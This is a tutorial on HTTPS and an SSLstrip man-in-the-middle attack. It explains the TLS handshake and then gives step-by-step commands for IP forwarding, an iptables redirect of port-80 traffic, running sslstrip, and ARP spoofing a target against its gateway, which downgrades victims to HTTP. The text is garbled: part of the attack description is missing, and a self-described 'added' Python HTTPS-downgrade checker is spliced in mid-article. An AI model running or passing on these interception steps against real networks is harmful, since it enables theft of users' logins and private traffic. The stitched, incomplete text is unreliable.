What is SSL?
Secure Sockets Layer (SSL) is a network protocol that encrypts
communication between computers so that no one can read it simply by
eavesdropping on the channel. Because it secures the communication,
critical sites such as your banking site, Gmail and Facebook use an SSL
channel, i.e. HTTPS. HTTPS is HTTP carried over a secure (SSL) channel.
The ultimate goal is to create secure channels over insecure networks.
How HTTPS communication takes place between Client and Server?
HTTPS assures the client that the visited site is trustworthy. Consider a
client that wants to connect to its bank's site, ABCbank, which uses an
HTTPS connection. The client's browser goes through the following steps.
1. The client browser connects to http://ABCbank.com on port 80 using
HTTP.
2. The server redirects the client to the HTTPS version of this site using
an HTTP code 302 redirect.
3. The client connects to https://ABCbank.com on port 443.
4. The server provides a certificate to the client containing its digital
signature. This certificate is used to verify the identity of the site.
5. The client takes this certificate and verifies it against its list of
trusted certificate authorities.
6. Once verification is completed, a secure communication channel is
established between server and client.
7. If the client cannot find the certificate among its list of trusted
ones, a certificate validation error is presented and you are asked to
either stay away from this untrusted site or, if you still trust the
source of the site, to Add Exception and proceed at your own risk.
changes.
3. The attacking machine supplies certificates to the web server and
impersonates the client.
4. Traffic is received back from the secure website and provided back to
the client.
IS THERE ANY VISIBLE DIFFERENCE AT SERVER SIDE OR CLIENT
SIDE WHEN ATTACK IS PERFORMED?
This attack tricks the server into believing that the attacker's machine is
the client. It works quite well against the server because, as far as the
server is concerned, it is still receiving the SSL traffic it expects, only
from the attacker's machine. Thus the server won't see any difference when
the attack is performed.
The difference can be seen only on the client side: the URL in the client's
browser won't be HTTPS. Instead the client receives an HTTP channel that
comes from the attacker's machine and not directly from the server. Hence
an alert user might be alarmed by the URL and realize that something is
fishy.
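The client-side difference described above can be checked mechanically. The following Python is an added example, not code from the original article: it classifies a recorded redirect chain as normal, downgraded to HTTP, or exposed to a downgrade. The hop data, the https_only_hosts set and the function names are constructed for illustration, and the Strict-Transport-Security (HSTS) check is an addition the article does not cover.

```python
from urllib.parse import urlsplit

# Constructed sample data: each hop is (url, status, headers) as a client records it.
NORMAL = [
    ("http://ABCbank.com/", 302, {"Location": "https://ABCbank.com/"}),
    ("https://ABCbank.com/", 200, {"Strict-Transport-Security": "max-age=31536000"}),
]
STRIPPED = [  # the client never leaves HTTP: no 302, no certificate check
    ("http://ABCbank.com/", 200, {"Content-Type": "text/html"}),
]
NO_HSTS = [
    ("http://ABCbank.com/", 302, {"Location": "https://ABCbank.com/"}),
    ("https://ABCbank.com/", 200, {}),
]

def hsts_max_age(headers):
    """Return max-age from a Strict-Transport-Security header, or 0 if absent/invalid."""
    value = next((v for k, v in headers.items()
                  if k.lower() == "strict-transport-security"), "")
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        if name.lower() == "max-age" and arg.strip('"').isdigit():
            return int(arg.strip('"'))
    return 0

def audit_chain(hops, https_only_hosts):
    """Classify one page load. https_only_hosts holds lowercase host names
    that are known (assumption) to always redirect to HTTPS."""
    findings = []
    final_url, _status, final_headers = hops[-1]
    final = urlsplit(final_url)  # .hostname is lowercased by urlsplit
    if final.hostname in https_only_hosts and final.scheme != "https":
        findings.append("DOWNGRADED: HTTPS-only host was served over HTTP")
    if urlsplit(hops[0][0]).scheme == "http" and final.scheme == "https":
        if hsts_max_age(final_headers) == 0:
            findings.append("EXPOSED: plaintext first hop and no HSTS policy")
    return findings or ["OK"]

if __name__ == "__main__":
    for name, chain in (("normal", NORMAL), ("stripped", STRIPPED), ("no-hsts", NO_HSTS)):
        print(name, audit_chain(chain, {"abcbank.com"}))
```

An HSTS policy only takes effect after the browser has received it once over HTTPS, so the very first visit still relies on the user or a preload list.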
To perform this attack you need SSLstrip, which can be downloaded from
here. It only runs on Linux systems; another option is to download
Backtrack5, which has SSLstrip preinstalled.
Steps to Attack
I am using Backtrack Linux to perform this attack. Open the shell and type the
command.
echo 1 > /proc/sys/net/ipv4/ip_forward
This command configures the machine for IP forwarding.
Fig: Enabling IP Forwarding
The next step is to modify the iptables firewall configuration. We need to
intercept all HTTP traffic and redirect it to the port on which SSLstrip
is listening. The command is as below:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
Replace <listenPort> in the above command with a port of your choice.
Fig: Configuring IPtables to properly route HTTP traffic
The next step is to have SSLstrip listen on the port specified in the
above command. The command is as below:
sslstrip -l <listenPort>
Fig: Using SSLstrip
The last step in this process is to configure ARP spoofing to intercept the
traffic of the target host.
arpspoof -i <interface> -t <targetIP> <gatewayIP>
Fig: Configuring ARP Spoofing